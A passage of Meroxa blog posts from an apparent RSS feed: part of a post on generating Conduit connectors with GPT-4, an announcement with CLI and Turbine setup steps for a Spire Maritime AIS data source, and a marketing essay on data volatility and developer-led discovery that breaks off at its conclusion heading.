&lt;p&gt;On the government side of our business, we operate as a small, lean team with multiple efforts happening in tandem. One of those efforts is a project with the United States Space Force to build data pipelines from commercial and government providers to a central repository or library where the aggregated data can be easily accessed and utilized. Getting those pipelines built quickly is of the utmost importance to the customer due to demand, so reducing the time to build connectors without burdening our team was essential. Not only is reducing build time beneficial for the government team, but it’s also beneficial to our company and our users as a whole. This worthwhile investment will pay dividends down the road.&lt;/p&gt;
&lt;h2&gt;How Did We Accomplish This?&lt;/h2&gt;
&lt;p&gt;Well, the title of this blog post and opening paragraph gives the answer away - we used OpenAI’s GPT-4 😂. We ultimately decided to use it because it allowed us to reduce the time to build a connector as it is able to automatically generate high-quality code, configuration templates, and documentation, significantly speeding up the development process. It assisted us in rapidly iterating through dev cycles, finding potential issues and providing helpful insights, thus greatly reducing the time and effort required for data pipeline building.&lt;/p&gt;
&lt;p&gt;By harnessing this capability, we successfully reduced the development time of connectors. By feeding Conduit connector code to GPT-4, we enabled the model to learn and generate connector code from prompts, streamlining the development process. Here are the system prompts we used to direct GPT-4 in building the connector:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;You are an expert Go developer.&lt;/li&gt;
&lt;li&gt;Conduit is an open-source data integration tool written in Go.&lt;/li&gt;
&lt;li&gt;Here is the &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-sdk&quot;&gt;code&lt;/a&gt; for the Conduit Connector SDK for a Source Connector.&lt;/li&gt;
&lt;li&gt;Here is the &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-kafka&quot;&gt;code&lt;/a&gt; for an example Source Connector for Kafka.&lt;/li&gt;
&lt;li&gt;Write a source connector for &lt;code class=&quot;language-text&quot;&gt;&amp;lt;insert connector you want to build here&gt;&lt;/code&gt;. &lt;code class=&quot;language-text&quot;&gt;CODE ONLY&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Like magic, GPT-4 generated functional code we were able to use to build connectors. Keep in mind GPT-4 is not flawless. It fell short in cases where the generated code occasionally contained errors due to a lack of context regarding external dependencies, which is sometimes evident in the generated unit tests. While the model typically does a commendable job of rectifying errors with further prompts, developer expertise and intervention are occasionally necessary to address these issues. Keeping that in mind, there are a host of benefits we’ve experienced using GPT-4 such as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Generating functional Go code for Conduit connector within seconds.&lt;/li&gt;
&lt;li&gt;Receiving guidance on debugging various issues encountered during development.&lt;/li&gt;
&lt;li&gt;Being able to feed it additional prompts to rewrite and optimize functions.&lt;/li&gt;
&lt;li&gt;Streamlining development through efficient struct generation for handling deeply nested responses for various APIs, enabling seamless data integration and pipeline building across multiple platforms.&lt;/li&gt;
&lt;li&gt;Rapidly generate unit tests for input code snippets, which is a significant advantage, as may developers find writing tests tedious.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To see an example of a connector we build using GPT-4 check out our &lt;a href=&quot;https://meroxa.com/integrations/source/spire-maritime-ais/&quot;&gt;Spire Maritime AIS&lt;/a&gt; source data integration connector. If you’re up for the challenge of using GPT-4 for your development efforts, we urge you to try it out!&lt;/p&gt;
&lt;p&gt;If you’re interested in learning more about Conduit check out the&lt;a href=&quot;https://www.conduit.io/docs/introduction/getting-started&quot;&gt;Conduit documentation&lt;/a&gt;, the&lt;a href=&quot;https://docs.conduit.io/api/&quot;&gt;Conduit API documentation&lt;/a&gt;, and the&lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-sdk&quot;&gt;Conduit SDK&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Join the discussion on &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions&quot;&gt;GitHub&lt;/a&gt; or become a part of &lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;our community&lt;/a&gt; to share your experiences in using GPT-4 to tackle your data integration challenges. We&apos;re excited to hear from you!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Spire Maritime AIS Source Data Integration now Generally Available]]></title><description><![CDATA[The Spire Maritime AIS source data integration is the first of its kind. It works natively with Meroxa's stream processing data platform.]]></description><link>https://meroxa.com/blog/spire-maritime-ais-source</link><guid isPermaLink="false">https://meroxa.com/blog/spire-maritime-ais-source</guid><dc:creator><![CDATA[William Hill]]></dc:creator><pubDate>Wed, 24 May 2023 14:04:43 GMT</pubDate><content:encoded>&lt;p&gt;We are excited to announce general availability of the source data integration withSpire Maritime AIS. Meroxa customers can stream maritime activity from the&lt;strong&gt;Spire Maritime 2.0 GraphQL API&lt;/strong&gt;, transform that data using function code, and deliver to any downstream destination in real-time.&lt;/p&gt;
&lt;p&gt;This is a first of its kind source data integration with Spire Maritime AIS that works natively with a stream-processing data platform.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;a href=&quot;https://spire.com/maritime/&quot;&gt;Spire Maritime AIS&lt;/a&gt;&lt;/strong&gt; delivers real-time global maritime activity information by using a constellation of satellites and terrestrial sensors that track and transmit vessel and ship signals to provide their location, routes, and movements.&lt;/p&gt;
&lt;p&gt;Organizations worldwide analyze and process insights from the Spire AIS APIs and TCP stream to help with global logistics, collision avoidance, surveillance, fishery management, and environmental monitoring.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;a href=&quot;https://meroxa.com/&quot;&gt;Meroxa&lt;/a&gt;&lt;/strong&gt; is a Stream Processing Data Application Platform as a Service that enables developers to build and run stream-processing data applications that respond to real-time data and events while managing all of the underlying infrastructure required to scale stream-processing workloads.&lt;/p&gt;
&lt;p&gt;The Meroxa platform manages the underlying infrastructure required to scale stream-processing data applications and was designed to work natively with our own in-house designed, easy-to-use application framework called Turbine. Turbine enables developers to quickly build using popular programming languages, such as Python, JavaScript, Ruby, and Go, without needing to write domain-specific code.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Getting started with Spire Maritime AIS on Meroxa&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;To stream maritime activity from Spire Maritime AIS on the Meroxa Platform, you must have an existing Spire AIS client account. If you are not already a client and wish to purchase Spire AIS products, you should &lt;a href=&quot;https://spire.com/talk-to-sales/&quot;&gt;contact the Spire AIS team&lt;/a&gt; directly.&lt;/p&gt;
&lt;p&gt;Once you have a unique API token, login to your &lt;a href=&quot;https://auth.meroxa.io/login?state=hKFo2SBVdHNFUFNGLUtoNE4yOVNZSGV5VTZjRDJsRWJoVWJWeaFupWxvZ2luo3RpZNkgQ3loN3NNY2NKSk5EU19RZ3gtQ0c2WDRwZlk4YVRFem6jY2lk2SBUeTJQeUxiZGFoNnBJcVJaaXEzdXhod0Exdmh2ZzZDNg&amp;#x26;client=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;protocol=oauth2&amp;#x26;redirect_uri=https%3A%2F%2Fdashboard.meroxa.io%2Fcallback&amp;#x26;audience=https%3A%2F%2Fapi.meroxa.io%2Fv1&amp;#x26;scope=openid+profile+email+user&amp;#x26;response_type=code&amp;#x26;response_mode=query&amp;#x26;nonce=U2dGN3FNTmQtTENaOWYyVm1uTXNlXzNvemFLN08zYTEtMzNjR3E1Q3NCVA%3D%3D&amp;#x26;code_challenge=4kMrf0dlxTltWmY3GwdwQ9F8fCpjCP-m6UG5s8cURi0&amp;#x26;code_challenge_method=S256&amp;#x26;auth0Client=eyJuYW1lIjoiYXV0aDAtc3BhLWpzIiwidmVyc2lvbiI6IjEuMTQuMCJ9&amp;#x26;mode=login&quot;&gt;Meroxa account&lt;/a&gt; and &lt;a href=&quot;https://dashboard.meroxa.io/resources/new?type=spire_maritime_ais&quot;&gt;create a Spire Maritime AIS resource&lt;/a&gt;. Don’t have a Meroxa account? &lt;a href=&quot;https://meetings.hubspot.com/haller/get_started&quot;&gt;Contact us&lt;/a&gt; to get started.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Create a Spire Maritime AIS Resource&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;In order for a Turbine streaming application to securely connect with the &lt;strong&gt;Spire Maritime 2.0 GraphQL API&lt;/strong&gt; as a source, a Resource must be created.&lt;/p&gt;
&lt;p&gt;Resources are used by the Meroxa platform to abstract sensitive credentials away from the Turbine application code. In this section, we’ll guide you through the steps on how to create &lt;strong&gt;Spire Maritime AIS&lt;/strong&gt; Resources.&lt;/p&gt;
&lt;p&gt;As mentioned earlier, we require a unique &lt;strong&gt;Spire Maritime 2.0 GraphQL API token&lt;/strong&gt; to create a Meroxa resource. This can be acquired by contacting a representative at Spire AIS. Once you have received your API token, login to your &lt;a href=&quot;https://auth.meroxa.io/login?state=hKFo2SBVdHNFUFNGLUtoNE4yOVNZSGV5VTZjRDJsRWJoVWJWeaFupWxvZ2luo3RpZNkgQ3loN3NNY2NKSk5EU19RZ3gtQ0c2WDRwZlk4YVRFem6jY2lk2SBUeTJQeUxiZGFoNnBJcVJaaXEzdXhod0Exdmh2ZzZDNg&amp;#x26;client=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;protocol=oauth2&amp;#x26;redirect_uri=https%3A%2F%2Fdashboard.meroxa.io%2Fcallback&amp;#x26;audience=https%3A%2F%2Fapi.meroxa.io%2Fv1&amp;#x26;scope=openid+profile+email+user&amp;#x26;response_type=code&amp;#x26;response_mode=query&amp;#x26;nonce=U2dGN3FNTmQtTENaOWYyVm1uTXNlXzNvemFLN08zYTEtMzNjR3E1Q3NCVA%3D%3D&amp;#x26;code_challenge=4kMrf0dlxTltWmY3GwdwQ9F8fCpjCP-m6UG5s8cURi0&amp;#x26;code_challenge_method=S256&amp;#x26;auth0Client=eyJuYW1lIjoiYXV0aDAtc3BhLWpzIiwidmVyc2lvbiI6IjEuMTQuMCJ9&amp;#x26;mode=login&quot;&gt;Meroxa account&lt;/a&gt; and create a &lt;strong&gt;Spire Maritime AIS&lt;/strong&gt; resource in one of two ways:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Meroxa CLI&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;In the following example, we create a Spire Maritime AIS resource named &lt;strong&gt;my-spire-ais&lt;/strong&gt;. Resources names may contain lowercase letters, numbers, underscores, and hyphens. We recommend that you choose something easy to identify as this will be used to refer to your Spire Maritime AIS resource when writing your Turbine application code.&lt;/p&gt;
&lt;p&gt;Using the &lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt; by running the following command:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;meroxa resource create my-spire-ais \
--type spire_maritime_ais \
--token $SPIRE_MARITIME_AIS_API_TOKEN&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Replace the &lt;strong&gt;$SPIRE_MARITIME_AIS_API_TOKEN&lt;/strong&gt; placeholder in the example command above with the API token provided by the Spire AIS team. When you’re ready, simply hit return and wait for confirmation through the Meroxa CLI that the resource has been successfully created.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Meroxa Dashboard&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Below are the steps required to create a Spire Maritime AIS resource using the &lt;a href=&quot;https://dashboard.meroxa.io/resources/new?type=spire_maritime_ais&quot;&gt;Meroxa Dashboard&lt;/a&gt;:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Navigate to the&lt;strong&gt;Resources&lt;/strong&gt; tab.&lt;/li&gt;
&lt;li&gt;Click the &lt;strong&gt;Add a Resource&lt;/strong&gt; button.&lt;/li&gt;
&lt;li&gt;Search for &lt;strong&gt;Spire Maritime AIS&lt;/strong&gt; using the search bar.&lt;/li&gt;
&lt;li&gt;Click the &lt;strong&gt;Add Resource&lt;/strong&gt; button for&lt;strong&gt;Spire Maritime AIS&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Confirm you are on the &lt;strong&gt;Add a resource&lt;/strong&gt; form with&lt;strong&gt;Spire Maritime AIS&lt;/strong&gt; selected.&lt;/li&gt;
&lt;li&gt;Provide a valid &lt;strong&gt;Resource Name&lt;/strong&gt; (e.g.,&lt;strong&gt;my-spire-ais&lt;/strong&gt;,&lt;strong&gt;myspire&lt;/strong&gt;,&lt;strong&gt;spire123&lt;/strong&gt;).&lt;/li&gt;
&lt;li&gt;Provide a valid and unique &lt;strong&gt;Spire Maritime AIS API token&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Click the &lt;strong&gt;Save&lt;/strong&gt; button.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Resources can be updated in the Meroxa dashboard by going to the&lt;strong&gt;Resources&lt;/strong&gt; tab in the dashboard and clicking on the&lt;strong&gt;Spire Maritime&lt;/strong&gt; resource you’d like to update. You can update&lt;/p&gt;
&lt;p&gt;We do not display credentials, such as the API token, in any of our interfaces. However, if you need to update the API token at any time, you can do so in the Meroxa Dashboard or the Meroxa CLI.&lt;/p&gt;
&lt;p&gt;A notification in the dashboard will appear once your Spire Maritime AIS resource has been successfully created.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Using Spire Maritime AIS as a Source with Turbine&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Now that a Spire Maritime AIS resource has been created, you can use the Turbine application framework to stream and transform data in real-time directly from the &lt;strong&gt;Spire Maritime 2.0 GraphQL API&lt;/strong&gt; to any destination. To do this, you must have the Meroxa CLI installed.&lt;/p&gt;
&lt;p&gt;In the following examples, we will demonstrate how to do this with JavaScript using TurbineJs.&lt;/p&gt;
&lt;p&gt;First, initialize a Turbine streaming app by running the following command in the &lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt;:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;meroxa app init my-spire-app --lang javascript&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;A printed confirmation will let you know when you have successfully initialized your Turbine streaming app, meaning the application project files will be created in your current local directory. You may also include a &lt;strong&gt;--path&lt;/strong&gt; argument at the end of the command to provide an alternative local path.&lt;/p&gt;
&lt;p&gt;Next, run a command to get to the root of the Turbine application project:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;cd my-spire-app&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Within the project directory, you will find an &lt;strong&gt;app.js&lt;/strong&gt; file. Open this with your preferred code editor. There you will see self-documented boilerplate code with a custom function written in JavaScript to execute against the example data record set provided in the fixtures directory.&lt;/p&gt;
&lt;p&gt;To use the Spire Maritime AIS resource, directly pass its name (&lt;strong&gt;my-spire-ais&lt;/strong&gt;)as the only argument to the&lt;strong&gt;resources&lt;/strong&gt; method.&lt;/p&gt;
&lt;p&gt;To represent the source data stream, a &lt;strong&gt;records&lt;/strong&gt; method is used. Because there is no concept of a collection of data with the &lt;strong&gt;Spire Maritime 2.0 GraphQL API&lt;/strong&gt;, simply pass through an empty string:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;exports.App = class App {
  async run(turbine) {
    let source = await turbine.resources(&quot;my-spire-ais&quot;);
    let records = await source.records(&quot;*&quot;);
  }
};&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;That’s all it takes to get real-time maritime data streaming into your Turbine application.&lt;/p&gt;
&lt;p&gt;There are a couple of additional configurations that can be defined in your Turbine application code.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Source Configurations&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;The following source configurations are supported:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;strong&gt;Configuration&lt;/strong&gt;&lt;/th&gt;
&lt;th&gt;&lt;strong&gt;Required?&lt;/strong&gt;&lt;/th&gt;
&lt;th&gt;&lt;strong&gt;Example&lt;/strong&gt;&lt;/th&gt;
&lt;th&gt;&lt;strong&gt;Description&lt;/strong&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;batchSize&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;No, optional. Default is &lt;strong&gt;100&lt;/strong&gt;.&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;100&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Sets the maximum number of results to retrieve from the Spire Maritime 2.0 GraphQL API.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;### &lt;strong&gt;query&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;No, optional. See Data Record Format for default queried data.&lt;/td&gt;
&lt;td&gt;GraphQL query.&lt;/td&gt;
&lt;td&gt;Send a custom GraphQL query to the Spire Maritime 2.0 GraphQL API.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2&gt;&lt;strong&gt;What’s Next?&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;All that is left is for you to write function code to transform your Spire Maritime AIS stream data and event records to a downstream set of data stores, databases, or third-party APIs. Imagine what you can do with the power of Spire Maritime AIS at your fingertips.&lt;/p&gt;
&lt;p&gt;Need potential ideas for Turbine streaming apps? Check out our example &lt;a href=&quot;https://github.com/meroxa/turbine-examples&quot;&gt;Turbine app examples&lt;/a&gt; to get started. But don’t let these examples hinder you. There is no limit to what you and your team can achieve using Spire Maritime AIS and the power of the Meroxa platform.&lt;/p&gt;
&lt;p&gt;We can’t wait to see what you build! 🚀&lt;/p&gt;
&lt;p&gt;As always, if you need help, have questions, or just want to chat:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Don’t have a Meroxa account? &lt;a href=&quot;https://meetings.hubspot.com/haller/get_started&quot;&gt;Schedule an onboarding session&lt;/a&gt; with our team.&lt;/li&gt;
&lt;li&gt;Have a technical question? Reach out via email at &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;Join our Discord&lt;/a&gt; community.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Follow us&lt;/a&gt; on Twitter.&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Is Volatility “swamping” Your Data Discovery?]]></title><description><![CDATA[Meroxa enables big data projects to evolve with business needs and address data volatility challenges.]]></description><link>https://meroxa.com/blog/data-volatility</link><guid isPermaLink="false">https://meroxa.com/blog/data-volatility</guid><dc:creator><![CDATA[Keith Haller]]></dc:creator><pubDate>Tue, 16 May 2023 21:18:06 GMT</pubDate><content:encoded>&lt;p&gt;Data volatility is a significant challenge that organizations face when dealing with big data. The traditional Vs of big data - Volume, Velocity, and Variety, fail to capture the impact that volatility has on the success of big data projects. Volatility refers to data whose value fluctuates over time, making it challenging to identify, store, and process. Volatility demands discovery and discovery drives the long-term health of big data efforts.&lt;/p&gt;
&lt;p&gt;In this blog post, we discuss the significance of volatility and how it impacts the overall success of big data projects. We explain how managing data volatility effectively can pave the way for a more adaptive data environment that unlocks the true potential of your volatile data.&lt;/p&gt;
&lt;p&gt;To achieve this, organizations need to rethink their approach to data discovery. By empowering data stakeholders with development best practices and tooling, businesses can draw better business conclusions from their volatile data. We identify the key requirements for an effective data discovery strategy, including the need for AI-driven, open-source connectors, a code-first approach using established development best practices, and an efficient local testing solution.&lt;/p&gt;
&lt;h2&gt;The Big “Big Data” Problem&lt;/h2&gt;
&lt;p&gt;Big data efforts fail 85% of the time. In fact, it has been well documented that 70-80% of small data, data warehouses also failed. The reason for these high failure rates lies in their shared platform-led approach to optimization and neglect of discovery. That narrow focus hampered their ability to remain relevant and up-to-date. As a result, big data lakes turned into swamps, and small data warehouses lost their reliability.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Source:&lt;/strong&gt; &lt;a href=&quot;https://designingforanalytics.com/resources/failure-rates-for-analytics-bi-iot-and-big-data-projects-85-yikes/&quot;&gt;https://designingforanalytics.com/resources/failure-rates-for-analytics-bi-iot-and-big-data-projects-85-yikes/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The crux of the problem is that these efforts do not foster effective discovery processes driven by developers. Instead, they adopt a platform-led discovery approach that introduces significant delays and prevents developers from adequately supporting the discovery process. Consequently, these big data initiatives are unable to adapt and meet the evolving needs of the business.&lt;/p&gt;
&lt;p&gt;The fact that big data is big is a challenge. A platform-led approach is very good at optimizing performance of known challenges using known data. However, big data solving known performance challenges is not why data lakes turn into swamps or why they continue to fail at 85%. They fail because they do not enable developer-led discovery to keep the data relevant and current to the needs of the business.&lt;/p&gt;
&lt;p&gt;💡 For example, a popular ride-sharing company, managed over 100 petabytes of data, including trips, customer preferences, location details, and driver information. As the volume and velocity of data increased, the company had to build such a system that required significant investment in resources and infrastructure, highlighting the complexities of managing and leveraging massive amounts of data. &lt;strong&gt;Source:&lt;/strong&gt; &lt;a href=&quot;https://www.uber.com/en-CA/blog/uber-big-data-platform/&quot;&gt;https://www.uber.com/en-CA/blog/uber-big-data-platform/&lt;/a&gt;&lt;/p&gt;
&lt;h2&gt;Why is Volatility the most important V?&lt;/h2&gt;
&lt;p&gt;Big data has traditionally been defined by the 3Vs. The 85% percent failure rate of Data Lake projects can be explained by the missing fourth V, which is volatility. Volatility refers to data whose value is indeterminate and changes quickly. Volatility considers changes in business objectives in real-time and how the value of data fluctuates depending on the current needs of the business.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/3%20Vs%20Diagram_Volatility%20Blog%20Post.png&quot; alt=&quot;3 Vs Diagram_Volatility Blog Post&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/4%20Vs%20Diagram_Volatility%20Blog%20Post..png&quot; alt=&quot;4 Vs Diagram_Volatility Blog Post.&quot;&gt;&lt;/p&gt;
&lt;p&gt;Volatility impacts the original 3Vs in the following ways:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Volume: Volatility of data storage can result in swamps of unused data, and prevent discovery because potentially impactful data is left out.&lt;/li&gt;
&lt;li&gt;Velocity: Volatility of necessary latency of data can also lead to even greater volume and performance problems.&lt;/li&gt;
&lt;li&gt;Variety: Volatility in data types and needed connectors complicate identifying valuable data, integrating new sources, and maintaining effective data management systems.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;In short, Volatility is the most important because your data stores can’t evolve to meet the needs of your business unless you properly handle volatility and its impact on discovery.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Rethinking the Approach to Volatile Data Discovery&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Challenges such as technology complexity, and poorly defined business objectives, make data discovery a daunting task. Coupled with rapidly evolving business conditions and the inherent volatility of data, organizations often struggle to discover insights from their data. Although companies can execute data discovery projects, these efforts often come at a significant cost in terms of resources, system expertise, and long timelines. Even with such investments, businesses may still fail to achieve meaningful conclusions due to the constantly changing nature of business.&lt;/p&gt;
&lt;p&gt;Addressing these challenges requires a new approach to data discovery that empowers data stakeholders with development best practices and tooling. By placing data stakeholders as the lead for discovery, they can draw better business conclusions from their volatile data.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Embracing an Effective Developer-led Discovery Strategy&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;The right tooling to embrace an effective data discovery strategy should offer the following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Put the data stakeholders closest to the data&lt;/li&gt;
&lt;li&gt;Remove the need for expertise in complex data technologies&lt;/li&gt;
&lt;li&gt;A fast, AI-driven, open-source, cross-platform approach for building connectors is vital.
&lt;ul&gt;
&lt;li&gt;Connectors should be built quickly to support discovery.&lt;/li&gt;
&lt;li&gt;Open source connectors enable sharing not only within a single department or platform but also benefit the enterprise.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;A code-first approach using established development best practices:
&lt;ul&gt;
&lt;li&gt;Leverages developers&apos; existing expertise in specific programming languages.&lt;/li&gt;
&lt;li&gt;Enables developers to efficiently utilize familiar tools and frameworks.&lt;/li&gt;
&lt;li&gt;Encourages custom solutions, collaborations, and integrates into existing workflows&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;An efficient and cost-effective local testing solution:
&lt;ul&gt;
&lt;li&gt;Rapid iterations enable stakeholders to respond to changing business requirements.&lt;/li&gt;
&lt;li&gt;Allows for safe experiment with new data of uncertain value in an isolated environment without affecting the main system or incurring significant storage costs.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;The right tool should answer questions like, &quot;What data should I collect now?&quot; and &quot;Why should I collect this data?&quot; without being cost-prohibitive or resource intensive.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;strong&gt;Addressing Data Volatility &amp;#x26; Discovery with Meroxa&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Having explored the significance of data volatility and the necessity for a developer-led approach, it becomes clear that organizations need a solution that caters to these requirements. Meroxa is that solution. Designed to address the challenges of data volatility, Meroxa empowers developers to take control of their data discovery.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Before%20Meroxa%20Diagram_Volatility%20Blog%20Post%20.png&quot; alt=&quot;Before Meroxa Diagram_Volatility Blog Post&quot;&gt;&lt;/p&gt;
&lt;p&gt;Meroxa offers a vendor-neutral, developer-led, open-source, code-first approach that integrates well into any existing infrastructure.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Programming Language and Connector Neutral&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Meroxa&apos;s programming language and connector neutral approach empowers developers to maintain optimal productivity. By providing connectors for a wide range of data stores, such as databases, cloud platforms, SaaS applications, APIs, data lakes, and messaging systems, Meroxa enables seamless integration and flexibility, catering to diverse needs in the ever-evolving technological landscape.&lt;/p&gt;
&lt;p&gt;Meroxa addresses this issue by offering connectors for any data store, including databases, cloud platforms, SaaS apps, APIs, data lakes, and messaging systems.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Developer Led&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;In order to increase velocity and reduce time to value of new data products and initiatives, the Meroxa platform supports a developer-led, self-service approach. Once resources (such as databases and APIs) have been onboarded to the platform, they are made available for use via friendly names, with all unnecessary implementation details abstracted away.&lt;/p&gt;
&lt;p&gt;This significantly reduces complexity by removing the need for deep knowledge of every resource type and improves flexibility as swapping resources is a matter of changing the reference. Developers can typically deploy fully functioning, production grade pipelines within hours.&lt;/p&gt;
&lt;p&gt;Granular resource-specific security can be passed through the platform by applying security controls on the resource (taking advantage of the full fidelity of permissions and controls) and then registering associated credentials with the platform. Credentials are never displayed to the end user fully abstracting access.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Open Source&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Meroxa embraces open-source principles to encourage collaboration and innovation within and beyond enterprises. Developers can build connectors faster with Meroxa&apos;s AI-driven method, and connectors are based on data stakeholder demands and actual use cases, rather than being dictated by platform providers&apos; assumptions about what is needed.&lt;/p&gt;
&lt;p&gt;Meroxa&apos;s open-source connectors are designed for rapid deployment, allowing developers to quickly and efficiently access a wide variety of data sources. By embracing the power of collaboration and developer-driven innovation, organizations can unlock the true potential of their data and drive innovation like never before.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Code-First&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The Meroxa Turbine toolchain delivers a rich local development experience, allowing for a rapid/tight feedback loop. It builds on decades of software engineer processes and workflows, providing a familiar and robust developer experience. Developers build stream processing applications and pipelines using their favorite programming languages. They can leverage the wealth of existing libraries and packages in those languages.&lt;/p&gt;
&lt;p&gt;One of the key features offered by Meroxa is local testing. Local testing creates a safe, isolated environment for developers to experiment with new data, test its value, and explore its potential uses without affecting the main system or incurring significant storage costs, empowering developers to innovate freely.&lt;/p&gt;
&lt;p&gt;Organizations can also extend their software development processes and workflows to encapsulate data engineering with native support for Git, seamlessly integrating data operations into the established software development life cycle.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/After%20Meroxa%20Developer-led_Volatility%20Blog%20Post.png&quot; alt=&quot;After Meroxa Developer-led_Volatility Blog Post&quot;&gt;&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/h2&gt;
